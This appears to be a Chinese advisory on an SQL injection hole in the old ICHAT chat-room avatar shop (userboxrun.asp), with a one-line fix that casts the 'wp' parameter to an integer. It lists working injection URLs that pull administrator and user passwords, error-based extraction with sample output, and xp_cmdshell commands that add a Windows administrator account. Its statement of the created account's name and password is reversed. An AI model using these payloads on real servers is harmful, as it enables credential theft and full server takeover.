关于ICHAT老版头像超市的漏洞注入解决办法
解决办法:
在
wpid=request.querystring("wp")
wpid=replace(wpid,"'","")
添加:
wpid=cint(wpid)百宝箱里面的userboxrun.asp,userboxsend1.asp等文件存在sql 注入漏洞,用户提交:
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 username from admin)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 pass from admin)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 username from userinfo)
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 userpassword from userinfo)
等一系列url能得到聊天室管理员用户名称和密码。
在没关闭详细错误显示的sql版服务器上提交:
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 username from admin)=5
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258 ;and (select top 1 pass from admin)=5
类似url可以得到如下显示
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 varchar 值 'admin' 转换为数据类型为 int 的列时发生语法错误。
/shop/userboxrun.asp,行27
admin即为管理员名称
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
将 varchar 值 'ichat' 转换为数据类型为 int 的列时发生语法错误。
/shop/userboxrun.asp,行27
ichat即为管理员密码,具体过程不再详述。
最危险的是,在没删除xp_cmdshell储存过程的sql版服务器上,如果用于ichat连接数据库的sql用户是sa权限的,提交如下url:
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258;exec master.dbo.xp_cmdshell "net user huaidan huaidan1 /add";--
http://xx.xx.xx.xx/shop/userboxrun.asp?wp=1258;exec master.dbo.xp_cmdshell "net localgroup administrators huaidan /add";--
可以添加用户名称为:huaidan1,密码为:huaidan的服务器管理员。
解决办法:
在
wpid=request.querystring("wp")
wpid=replace(wpid,"'","")
添加:
wpid=cint(wpid)
- 上一篇:ICHAT进入房间默按级别排序 2022/1/30
- 下一篇:iChat防格最新措施(所有版本通用) 2022/1/30